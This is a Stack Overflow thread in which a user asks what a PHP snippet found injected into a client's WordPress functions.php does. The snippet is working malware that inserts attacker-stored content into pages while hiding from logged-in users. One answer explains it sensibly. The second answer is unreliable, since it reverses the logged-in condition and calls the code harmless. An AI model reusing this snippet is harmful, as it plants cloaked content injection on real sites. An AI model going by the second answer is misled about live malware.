What does this malicious code injected into functions.php file do? [closed]

Question

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.

---

Closed 8 years ago.

• Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
• We don’t allow questions about professional server or networking-related infrastructure administration on Stack Overflow. You can edit the question so it’s on-topic for Stack Overflow.

Improve this question

I have discovered some malicious code in a clients functions.php file. What is this doing, I have no idea. I'm OK with PHP but no expert for sure. Any ideas?

if (!function_exists("b_call")) {
    function b_call() {
        if (!ob_get_level()) ob_start("b_goes");
    }
    function b_goes($p) {
        if (!defined('wp_m1')) {
            if (isset($_COOKIE['wordpress_test_cookie'])
                || isset($_COOKIE['wp-settings-1'])
                || isset($_COOKIE['wp-settings-time-1'])
                || (function_exists('is_user_logged_in') && is_user_logged_in())
                || (!$m = get_option('_content1'))
            ) {
                return $p;
            }
            list($m, $n) = @unserialize(trim(strrev($m)));
            define('wp_m1', $m);
            define('wp_n1', $n);
        }
        if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
        if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
        return $p;
    }
    function b_end() {
        @ob_end_flush();
    }
    if (ob_get_level()) ob_end_clean();
    add_action("init", "b_call");
    add_action("wp_head", "b_call");
    add_action("get_sidebar", "b_call");
    add_action("wp_footer", "b_call");
    add_action("shutdown", "b_end");
}

Answer 1

It allows for pulling whatever is saving in the options table in the column _content1 to be added as content into the header,footer, etc of the WordPress theme.

Whoever injected the code most likely set some html to _content1 option, like a viagra add, or they have a another script on the server waiting to update the option. You probably want to look for strange .php files in the root of your site. There may be a simple eval($_REQEST) waiting for you.

Answer 2

It is pulling in content from the Wordpress option field _content1 if the user is logged in. It is also adding new line characters after the body, head and div tags. So far as I can tell there is no malicious code. The strangest code in that block is the OB code, which is just functions for PHPs output buffer - which is also not malicious.